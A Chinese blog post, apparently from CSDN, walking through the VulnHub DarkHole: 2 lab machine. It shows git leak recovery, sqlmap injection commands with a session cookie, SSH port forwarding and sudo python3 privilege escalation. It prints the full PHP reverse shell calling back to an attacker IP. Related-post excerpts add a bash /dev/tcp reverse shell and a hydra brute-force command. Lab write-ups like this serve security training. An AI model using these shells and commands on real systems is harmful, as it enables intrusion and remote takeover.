Vulnhub-DARKHOLE: 2

最新推荐文章于 2024-05-01 09:31:12 发布
最新推荐文章于 2024-05-01 09:31:12 发布
阅读量331 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Re1_zf/article/details/128894387
版权
本文详述了一次渗透测试的过程,包括通过扫描发现靶机,利用git源码泄露获取登录凭证,进行SQL注入获取数据库信息,通过SSH连接并端口转发,最终反弹shell并实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、概要

靶机地址:192.168.64.137
攻击机地址:192.168.64.128
靶机下载地址:https://download.vulnhub.com/darkhole/darkhole_2.zip

二、主机发现

扫描局域网主机,找到靶机ip

三、信息收集

1、git源码泄露

nmap扫描一下,22端口ssh服务和80端口web服务是开着的

根据扫描的信息显示,web服务是有git源码泄露的

使用wget将泄露的git源码下载下来

wget -r http://192.168.64.137:80/.git/

2、git log查看日志

使用git log查看日志

明显发现对login.php做了修改

添加了具有默认登录凭证的的login.php文件

3、git show得到账号密码

git show查看一下

得到账号密码

mail:lush@admin.com
password:321

登录成功

四、渗透测试

1、SQL注入

sqlmap直接对url进行SQL注入爆破,但是这里需要带上cookie

sqlmap -u "http://192.168.64.137/dashboard.php?id=1" --cookie PHPSESSID=gs3not6v81071sja60eocnbci2 -dbs --batch

爆破表

sqlmap -u "http://192.168.64.137/dashboard.php?id=1" --cookie PHPSESSID=gs3not6v81071sja60eocnbci2 -D darkhole_2 --tables --batch

最后爆出来ssh表的内容

sqlmap -u "http://192.168.64.137/dashboard.php?id=1" --cookie PHPSESSID=gs3not6v81071sja60eocnbci2 -D darkhole_2 -T ssh --dump --batch
username:jehad
password:fool

2、ssh连接

使用上面这个账号密码登录一下ssh服务

ssh服务连接成功

查看一下当前目录下文件

查看这个bash_history文件发现了可疑的地方

3、端口转发

看上去应该是进行了一下端口转发

查看一下定时任务就可以看到详细信息

cat /etc/crontab

查看进程也可以

pa -ef | grep 9999

网络状态也是可以的

netstat -pantu | grep LISTEN

来到对应目录,查看文件

可以看到这是一个很明显的马

将9999端口转发到本地

ssh -L 9999:127.0.0.1:9999 jehad@192.168.64.137

可以正常执行那个木马

4、反弹shell

在下面的网站生成一个php反弹shell木马

Online - Reverse Shell Generator (revshells.com)

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
a
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.64.128';
$port = 9999;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    
    if ($pid) {
        exit(0);  // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

从攻击机wget获取过来执行

执行之前kali要开启端口监听

得到shell

python获取一下交互式命令行

5、FirstBlood

得到第一个flag

6、另一个用户的密码

从当前目录下的.bash_history文件下发现密码

查看用户权限,python3就是root权限

7、提权

直接提权

sudo python3 -c 'import pty;pty.spawn("/bin/bash")'

五、总结

1、git源码泄露可以用git相关命令,比如git log和git show,都可以快速定位敏感信息
2、sqlmap进行测试时,有时网站需要指定cookie
3、ssh -L可以进行端口转发,语法类参考ssh -L 9999:127.0.0.1:9999 jehad@192.168.64.137
4、脚本反弹shell
5、.bash_history很有可能隐藏着敏感信息
6、简单的sudo提权

DarkHole: 2 vulnhub walkthrough
xdeclearn的博客
09-08 594
主机和端口发现: ➜ ~ nmap -sn 192.168.143.0/24 Host is up (0.00010s latency). Nmap scan report for 192.168.143.206 ➜ ~ nmap -T4 -v -p- 192.168.143.206 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 访问web服务,有一个登录页面: 尝试注入失败,于是dirb爆破一下目录: 发现了git目录,于是使用
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 744
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1562
vulnhub靶场 DarkHole: 2,难度:困难级别
Vulnhub靶场】DARKHOLE: 2
DG_s1mple
03-23 1684
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 271
DarkHole2
vulnhubdarkhole_2
weixin_54431413的博客
07-04 806
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
2024年最新VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
2401_84239830的博客
05-01 1341
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。而且这个脚本属于用户losy,然后我们就可以使用 SSH 隧道连接端口 9999,然后,访问 127.0.0.1:9999 进行 RCE。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub系列--DARKHOLD:2
ch3cke的博客
03-29 4015
信息收集 主机信息收集: ┌──(kali㉿kali)-[~/Desktop/chall/vulnhub/DARKHOLE-2] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 08:.
靶场-DarkHole1
weixin_58602402的博客
06-16 406
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
Vulnhub_Darkhole_2
qq_45434762的博客
12-04 601
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关。主机信息kali:192.168.31.136 Darkhole_2:192.168.31.72信息收集使用netdicover发现目标主机IP为192.168.31.72然后使用nmap对目标机器进...
DARKHOLE: 2
weixin_45042115的博客
10-05 1938
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1370
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2
VulnhubDARKHOLE: 2渗透测试
Bird&Bird
01-11 3958
目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali:192.168.110.128 靶机:192.168.110.137 2、信息搜集 首先探测靶机IP地址 扫一下端口和服务,可知靶机只开启了2
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 6064
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DARKHOLE 2
Czheisenberg的博客
02-18 672
vulnhub靶场——DarkHole 2 WriteUp
DarkHole_2
追求卓越,技术流~
01-14 1683
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机:DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
darkhole2
qq_62144749的博客
09-02 482
vulnhub darkhole2
靶机:darkhole_2
weixin_50339323的博客
09-09 1567
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1590
VulnHub-DarkHole: 2靶机详细渗透过程
vulnhub KB-VULN: 2
最新发布
02-06
### VulnHub KB-VULN:2 下载和相关信息 #### 靶机概述 KB-VULN:2 是由 VulnHub 提供的一个虚拟机镜像,旨在帮助安全研究人员练习渗透测试技能。该靶机包含了多个已知的安全漏洞和服务配置错误,允许用户通过各种技术手段获取系统的控制权限。 #### 下载链接 KB-VULN:2 的官方下载页面位于 VulnHub 官方网站上[^1]。访问此链接可以找到详细的描述以及 OVA 文件的下载选项,适用于 VirtualBox 或 VMware 虚拟化平台。 #### 主要服务端口扫描结果 通过对目标机器进行网络扫描发现开放的服务如下: - **SSH (TCP/22)**:用于远程登录管理。 - **SMB/CIFS (TCP/445)**:运行着版本为 4.7.6 的 Samba smbd,在工作组模式下提供文件共享功能[^2]。 #### 可能存在的漏洞点 根据公开资料整理得出可能存在的几个攻击面: - SMB 协议可能存在未授权访问或弱密码问题。 - SSH 登录界面可尝试字典攻击破解合法账户凭证。 - 利用 Docker 容器特性实现进一步提权操作[^5]。 #### 渗透流程提示 为了成功完成挑战并获得 Flag 文件内容,建议按照以下思路探索: - 使用 `hydra` 工具暴力猜测常见用户名与密码组合来爆破 SSH 和其他潜在入口; - 枚举 SMB 共享资源目录结构寻找敏感数据泄露线索; - 探索本地 LXC/LXD 环境是否存在越界调用风险以达成最终目的; ```bash # 执行 nmap 扫描探测存活主机及其开启的服务 nmap -A <target_ip> # 尝试连接到 SMB 服务器查看可用资源共享情况 smbclient -L //<target_ip> -U% # 对指定账号实施 hydra 字典攻击模拟非法入侵行为 hydra ssh://<username>@<target_ip> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值